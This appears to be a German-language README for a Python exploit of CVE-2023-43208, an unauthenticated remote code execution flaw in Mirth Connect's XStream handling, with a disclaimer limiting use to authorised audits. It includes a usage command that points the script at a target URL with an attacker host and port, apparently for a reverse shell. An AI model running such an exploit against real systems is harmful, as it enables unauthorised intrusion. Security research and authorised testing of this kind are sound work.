
Python-Implementierung von CVE-2023-43208 Mirth Connect RCE (Unauth XStream)
Dieser Exploit nutzt eine kritische Deserialisierungsschwachstelle in der XStream-Engine von Mirth Connect aus. Sie rührt von einem unvollständigen Patch für CVE-2023-37679 her und ermöglicht eine nicht authentifizierte Ausführung beliebigen Codes in allen Versionen vor 4.4.1.
python3 mirth_rce.py https://{ziel} <angreifer_host> <angreifer_port>
Dieses Exploit-Skript ist ausschließlich für Bildungszwecke und autorisierte Sicherheitsaudits bestimmt, um Verteidiger bei der Minderung von CVE-2023-43208 zu unterstützen; jede Verwendung dieses Tools gegen nicht autorisierte Ziele ist illegal und liegt in der alleinigen Verantwortung des Endbenutzers. Der Autor stellt diese Software „wie besehen" ohne jegliche Gewährleistung zur Verfügung, lehnt jede Haftung für möglichen Missbrauch oder Schäden ab und befürwortet oder ermutigt nicht zu nicht autorisierten Aktivitäten. Nutzung auf eigene Gefahr und nur in Übereinstimmung mit geltenden Gesetzen.